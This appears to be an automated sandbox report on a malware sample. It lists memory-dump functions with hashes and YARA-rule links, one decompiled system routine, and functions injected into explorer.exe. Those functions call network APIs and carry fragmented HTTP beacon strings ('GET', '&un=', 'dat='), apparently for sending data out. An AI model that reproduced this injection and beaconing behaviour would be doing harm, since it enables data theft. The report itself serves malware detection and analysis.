                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ed78bda9a8667ed1dafdc77d1f24b9113591e7553237f1fa503e8c652ce90fe4
                                                                                                                • Instruction ID: d56d9bef695f4196200d9fcaab9bb9e2943e7fac5cfcbc102dd94e20cd9097dc
                                                                                                                • Opcode Fuzzy Hash: ed78bda9a8667ed1dafdc77d1f24b9113591e7553237f1fa503e8c652ce90fe4
                                                                                                                • Instruction Fuzzy Hash: DD90027135100803D14571A984046060009B7E0281F91C012A0414594EC6958A56BBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0123B040, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7fede21f171610c4e8516936636582854b81ac278ada4e6105e4c8ca5552cda9
                                                                                                                • Instruction ID: 4ccf98ec0f08eb805fc21addbe143095bb7cc4d49afc32de86ca79d47b486095
                                                                                                                • Opcode Fuzzy Hash: 7fede21f171610c4e8516936636582854b81ac278ada4e6105e4c8ca5552cda9
                                                                                                                • Instruction Fuzzy Hash: 859002A1711144434544B1A988044065015B7F1341391C121A04445A0CC6A88855A3A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012398A0, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 362b79e9608b028011625e55b5fcc58ce92a6c1ec139afb271dcbc05d873210a
                                                                                                                • Instruction ID: 3ac06b3b09c3fad72f38b4c0cb45121cc3f025aefd9127862bb05045b2bd9985
                                                                                                                • Opcode Fuzzy Hash: 362b79e9608b028011625e55b5fcc58ce92a6c1ec139afb271dcbc05d873210a
                                                                                                                • Instruction Fuzzy Hash: 4290026131100803D10661A984146060009E7E1385F91C012E1414595DC6658953B276
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239B00, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f1cd5b31554ddbb35f6f7c083aad7761d53ec035fbc77e456c70841ed8b209e4
                                                                                                                • Instruction ID: fa69c0eac622253e9593e661a6cf62e01ba98856f5463a773f11324cdd26f608
                                                                                                                • Opcode Fuzzy Hash: f1cd5b31554ddbb35f6f7c083aad7761d53ec035fbc77e456c70841ed8b209e4
                                                                                                                • Instruction Fuzzy Hash: 3E90026135100C03D14471A9C4147070006E7E0641F51C011A0014594DC656896577F5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0123A3B0, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ef4fdb880889d5e0d320a7d50096e767798bba0776fa08c1ab73437766525bc5
                                                                                                                • Instruction ID: 9ad38a21e59f4317b83977eb942bcb8e40fac588b35a09ae91fe03bb3c080bae
                                                                                                                • Opcode Fuzzy Hash: ef4fdb880889d5e0d320a7d50096e767798bba0776fa08c1ab73437766525bc5
                                                                                                                • Instruction Fuzzy Hash: 5890027131144403D14471A9C44460B5005B7F0341F51C411E0415594CC6558856A365
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239A10, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 07be3b804ed044322a30d6798fa08ea743fba815f12891c87c40952f55d24c58
                                                                                                                • Instruction ID: 7d28e4e2de689823e2288c1f5c9f90e0b64a0ae1efa68c5d34563d9a83799823
                                                                                                                • Opcode Fuzzy Hash: 07be3b804ed044322a30d6798fa08ea743fba815f12891c87c40952f55d24c58
                                                                                                                • Instruction Fuzzy Hash: E990027131140803D10461A988087470005A7E0342F51C011A5154595EC6A5C8917675
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239A80, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3624ff0b66f0e95e26803965efa4f07f179f4aac40c2381be6dd4e0d50bd8d0a
                                                                                                                • Instruction ID: fc2711773eb6a9abe521f6c615a1050365613bc7eb792c212edcd6fdbe45c672
                                                                                                                • Opcode Fuzzy Hash: 3624ff0b66f0e95e26803965efa4f07f179f4aac40c2381be6dd4e0d50bd8d0a
                                                                                                                • Instruction Fuzzy Hash: F090026131144843D14462A98804B0F4105A7F1242F91C019A4146594CC95588556765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239520, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c22ecd98a61a36991d2fa90b31115340d10075a466ae8c2b2f0799fef4e1f8e1
                                                                                                                • Instruction ID: e85df2e430c41a289dd6a847ddd09c5dd93a4a7062f1cc7815f2e2d1b3b38654
                                                                                                                • Opcode Fuzzy Hash: c22ecd98a61a36991d2fa90b31115340d10075a466ae8c2b2f0799fef4e1f8e1
                                                                                                                • Instruction Fuzzy Hash: 369002E1311144934504A2A9C404B0A4505A7F0241B51C016E10445A0CC5658851A279
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0123AD30, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7ff926dc01c46ce3f5fecd132b7aeca94483c650d872728ff117d2b4d97e88e3
                                                                                                                • Instruction ID: b18357a0cf475ec413fe95d44d6a7426b4128b6fb0cf449529e34eea633e716c
                                                                                                                • Opcode Fuzzy Hash: 7ff926dc01c46ce3f5fecd132b7aeca94483c650d872728ff117d2b4d97e88e3
                                                                                                                • Instruction Fuzzy Hash: 42900271B1500413914471A988146464006B7F0781B55C011A0504594CC9948A5563E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239560, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6aee01493c9af98b0caa1fbd81ac5b8cfd7e637eede50775b65b42b48ac1853
                                                                                                                • Instruction ID: e753e9f50a1518c6019cb204aa4cbdf2f27056831696f3cb01040d4d62a5b1e5
                                                                                                                • Opcode Fuzzy Hash: b6aee01493c9af98b0caa1fbd81ac5b8cfd7e637eede50775b65b42b48ac1853
                                                                                                                • Instruction Fuzzy Hash: A8900265331004030149A5A9460450B0445B7E6391391C015F14065D0CC66188656365
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012395F0, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c56f17ae192927fee59a1115c6328ae7bf2ffcc94230706576d9106088f21451
                                                                                                                • Instruction ID: 7cf0175dab6fb4c1699e69e0e3f5a63600c3f03c75d67e94120aa39be2e0d50e
                                                                                                                • Opcode Fuzzy Hash: c56f17ae192927fee59a1115c6328ae7bf2ffcc94230706576d9106088f21451
                                                                                                                • Instruction Fuzzy Hash: F790027131100C03D10861A988046860005A7E0341F51C011A6014695ED6A588917275
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239730, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43ef813015ee18ee1f224d3cd63224f3aedfe9ea9c6a7732df41da1acde000f8
                                                                                                                • Instruction ID: 44eabc918a905e5b192d26be8bb28ad3f18c693803c569bf0ef7aef86015ebc0
                                                                                                                • Opcode Fuzzy Hash: 43ef813015ee18ee1f224d3cd63224f3aedfe9ea9c6a7732df41da1acde000f8
                                                                                                                • Instruction Fuzzy Hash: B890026171500803D14471A994187060015A7E0241F51D011A0014594DC6998A5577E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0123A710, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 84f295e18a73088909f9b29bebb50ab137db6dc2b2f1d6fdb3319b119a014825
                                                                                                                • Instruction ID: f9855ea6a87e2944f8db2543aee06ca7512bf9cec2e6ce8b6da43aee6f843189
                                                                                                                • Opcode Fuzzy Hash: 84f295e18a73088909f9b29bebb50ab137db6dc2b2f1d6fdb3319b119a014825
                                                                                                                • Instruction Fuzzy Hash: 60900271311004539504A6E99804A4A4105A7F0341B51D015A4004594CC59488616265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239760, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 679781c9573efd65d524120f9dd20a6c9f3a1ff63e549c09e526018ee400eff4
                                                                                                                • Instruction ID: fcae6725ae30b941970d872e3c1192af5bcc8cf4c129e2424458699fb0c3e6d2
                                                                                                                • Opcode Fuzzy Hash: 679781c9573efd65d524120f9dd20a6c9f3a1ff63e549c09e526018ee400eff4
                                                                                                                • Instruction Fuzzy Hash: 4190027131100803D10461A995087070005A7E0241F51D411A0414598DD69688517265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0123A770, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8d5e009d3cd0b5c6eaf9378496a698c2967ee8bde38e35c035652999cc83e56c
                                                                                                                • Instruction ID: e4473885bdfce26e665148d878b0a3c52530828023e6d85eac06fe4dd8b6c7b6
                                                                                                                • Opcode Fuzzy Hash: 8d5e009d3cd0b5c6eaf9378496a698c2967ee8bde38e35c035652999cc83e56c
                                                                                                                • Instruction Fuzzy Hash: 8490027531504843D50465A99804A870005A7E0345F51D411A04145DCDC6948861B265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239770, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 556f2242bd64e68ba0de30b8e64bf5093e34daf7866774b925a124a457516800
                                                                                                                • Instruction ID: 607398b2cde4261f751cfa95df18658252414ab62bf979482d2ba8a2d8aa4460
                                                                                                                • Opcode Fuzzy Hash: 556f2242bd64e68ba0de30b8e64bf5093e34daf7866774b925a124a457516800
                                                                                                                • Instruction Fuzzy Hash: CE90026131504843D10465A99408A060005A7E0245F51D011A10545D5DC6758851B275
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239FE0, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: db5e5058b109395010fb2aa86e5ec46d8c8454160d4ba621629ab8713e666a44
                                                                                                                • Instruction ID: e9bf1b5575fe246d6aa35cd4f49db89a5777089467efc29aff7c9268209a54c8
                                                                                                                • Opcode Fuzzy Hash: db5e5058b109395010fb2aa86e5ec46d8c8454160d4ba621629ab8713e666a44
                                                                                                                • Instruction Fuzzy Hash: 9F90027132114803D11461A9C4047060005A7E1241F51C411A0814598DC6D588917266
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239610, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5b52f6c111d67593e4ad1ff3057fb0f6dd75a651d8624e11c60012cef8ec3510
                                                                                                                • Instruction ID: e43ecb3685530caa43d5e2fb31062d116efc6eaf52e496bbcee4b29c676f0ab7
                                                                                                                • Opcode Fuzzy Hash: 5b52f6c111d67593e4ad1ff3057fb0f6dd75a651d8624e11c60012cef8ec3510
                                                                                                                • Instruction Fuzzy Hash: A690027171500C03D15471A984147460005A7E0341F51C011A0014694DC7958A5577E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239650, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cafc6a1d3c0546ae384004b736532b94361641df873c537ed72e0aa232763ac1
                                                                                                                • Instruction ID: ded07c4d42f7a2f989b96cc1dc89d444d0a7829a6f07f021fbe2747b812a2abb
                                                                                                                • Opcode Fuzzy Hash: cafc6a1d3c0546ae384004b736532b94361641df873c537ed72e0aa232763ac1
                                                                                                                • Instruction Fuzzy Hash: 2D90027131504C43D14471A98404A460015A7E0345F51C011A00546D4DD6658D55B7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012396D0, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e0a1a093573f430bf60b475dbd21673ff1c2ab5e3a9ffa0facf5749e0bc0372a
                                                                                                                • Instruction ID: 3e7718c0d89cb804fa5212226b1e9685f07a3b3c29714d0516db79dd3476de0d
                                                                                                                • Opcode Fuzzy Hash: e0a1a093573f430bf60b475dbd21673ff1c2ab5e3a9ffa0facf5749e0bc0372a
                                                                                                                • Instruction Fuzzy Hash: 1190027131100C43D10461A98404B460005A7F0341F51C016A0114694DC655C8517665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239670, Relevance: .0, Instructions: 2COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction ID: 34cd7fe7305ffc5b0ea7c027525731c456b5501dd8243def6266b843b3c66593
                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0128FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0123CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01285720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01285720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                0x0128fdda
                                                                                                                0x0128fde2
                                                                                                                0x0128fde5
                                                                                                                0x0128fdec
                                                                                                                0x0128fdfa
                                                                                                                0x0128fdff
                                                                                                                0x0128fe0a
                                                                                                                0x0128fe0f
                                                                                                                0x0128fe17
                                                                                                                0x0128fe1e
                                                                                                                0x0128fe19
                                                                                                                0x0128fe19
                                                                                                                0x0128fe19
                                                                                                                0x0128fe20
                                                                                                                0x0128fe21
                                                                                                                0x0128fe22
                                                                                                                0x0128fe25
                                                                                                                0x0128fe40

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0128FDFA
                                                                                                                Strings
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0128FE2B
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0128FE01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                • Opcode ID: 5defff4eef130f71e45086d412aa001a3b285fee44009b7b610df679a3075f75
                                                                                                                • Instruction ID: 065aef102f4bbb02ca427a0d30b0395a288e00eb171473e1507fd6deb48c5d8b
                                                                                                                • Opcode Fuzzy Hash: 5defff4eef130f71e45086d412aa001a3b285fee44009b7b610df679a3075f75
                                                                                                                • Instruction Fuzzy Hash: E2F0F672210602BFEB282A86DC06F33BF5AEB44B30F144315F628561D1DBA2F87086F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: explorer.exe PID: 3388 Parent PID: 6300 explorer.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 061C67C2, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: getaddrinforecvsetsockopt
                                                                                                                • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                • API String ID: 1564272048-1117930895
                                                                                                                • Opcode ID: 6b29d3a9b8a0855173d04c797727fd6868756e6b291ffe8281b58d39a5f42485
                                                                                                                • Instruction ID: 6b02a1ee4a5eb03031da0365bc7581877a8e23d4380c32c5c54cbbb022d67903
                                                                                                                • Opcode Fuzzy Hash: 6b29d3a9b8a0855173d04c797727fd6868756e6b291ffe8281b58d39a5f42485
                                                                                                                • Instruction Fuzzy Hash: B3525F30618B088BC7A9EB68D8947EDB7E1FBA4310F54452ED4ABC7186EF70A545CB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C5A72, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 642nativefileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateRead
                                                                                                                • String ID: `
                                                                                                                • API String ID: 1419693385-2679148245
                                                                                                                • Opcode ID: 45bbae7e767650f39c1c953f00b072806357b07c5915991ab877e7873310bcd2
                                                                                                                • Instruction ID: dc4d3f1891b85822a8450ace0c4253f3138c9324650b3d9ef90bba02b9999362
                                                                                                                • Opcode Fuzzy Hash: 45bbae7e767650f39c1c953f00b072806357b07c5915991ab877e7873310bcd2
                                                                                                                • Instruction Fuzzy Hash: F9224D70A18A099FCB99DF28C4957AEF7E2FBA8311F40462EE45ED3650DB30E551CB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C2FF4, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: closesocket
                                                                                                                • String ID: clos$esoc$ket
                                                                                                                • API String ID: 2781271927-3604069445
                                                                                                                • Opcode ID: 4144c9b076020b5d18526d503d7d8c3c92f9ff16a9e0cf4144f221806cac682d
                                                                                                                • Instruction ID: 8dd83fad9c71f8efee38814f513e0301b319b55a116354d72ee7a4922cc302bc
                                                                                                                • Opcode Fuzzy Hash: 4144c9b076020b5d18526d503d7d8c3c92f9ff16a9e0cf4144f221806cac682d
                                                                                                                • Instruction Fuzzy Hash: 5DF03A7021CB089BCB84EF189489BAAB7E0FB99315F54066DE85ECB245C77586428B47
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C2FF2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: closesocket
                                                                                                                • String ID: clos$esoc$ket
                                                                                                                • API String ID: 2781271927-3604069445
                                                                                                                • Opcode ID: 24c39bc4845c5401fa2dca815a246fa826a042ab8a355e13ed83dec9282e93cd
                                                                                                                • Instruction ID: 57280e24943df8b4fcbcf3b2efe784ca8b4abce88260803f2c40aa41f93ae325
                                                                                                                • Opcode Fuzzy Hash: 24c39bc4845c5401fa2dca815a246fa826a042ab8a355e13ed83dec9282e93cd
                                                                                                                • Instruction Fuzzy Hash: 79F0177061CB089FCB84EF18D488B6AB6E0FB99354F54466DA45ECB245C7758A428B42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C2F72, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: connect
                                                                                                                • String ID: conn$ect
                                                                                                                • API String ID: 1959786783-716201944
                                                                                                                • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                • Instruction ID: 3a35f61b07c5b05ddfe1211cce3d561f28156ef52d0a6e7fc3e814ab9409c13f
                                                                                                                • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                • Instruction Fuzzy Hash: 9701E170618A0C8FCBD4EF5CE448B5577E0EB59315F1545AED90DCB266C774C9818BC2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C2F6E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: connect
                                                                                                                • String ID: conn$ect
                                                                                                                • API String ID: 1959786783-716201944
                                                                                                                • Opcode ID: e4b8985f9adc47d49ee37ea67832eb57cf2024d6bae2179db61ac7262cb99304
                                                                                                                • Instruction ID: 75c3ee1f0e88b9c533daeb5c0cded95659ede4ec29631ee8f5511965ead966f3
                                                                                                                • Opcode Fuzzy Hash: e4b8985f9adc47d49ee37ea67832eb57cf2024d6bae2179db61ac7262cb99304
                                                                                                                • Instruction Fuzzy Hash: E7012170618A0C8FCB94EF5CD488B54BBE0EB99325F1541AED84DCB266C774C9858BC1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 061C2EF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: send
                                                                                                                • String ID: send
                                                                                                                • API String ID: 2809346765-2809346765
                                                                                                                • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                • Instruction ID: 104a042ca805cad9d8df90e7084c86ac9d88ebaf3e5f84e7e37b94a3cdf382aa
                                                                                                                • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                • Instruction Fuzzy Hash: A7011270518A0C8FDBC4EF1CD448B1577E0EBAC315F1545AE985DCB266C670D9818B81
                                                                                                                Uniqueness

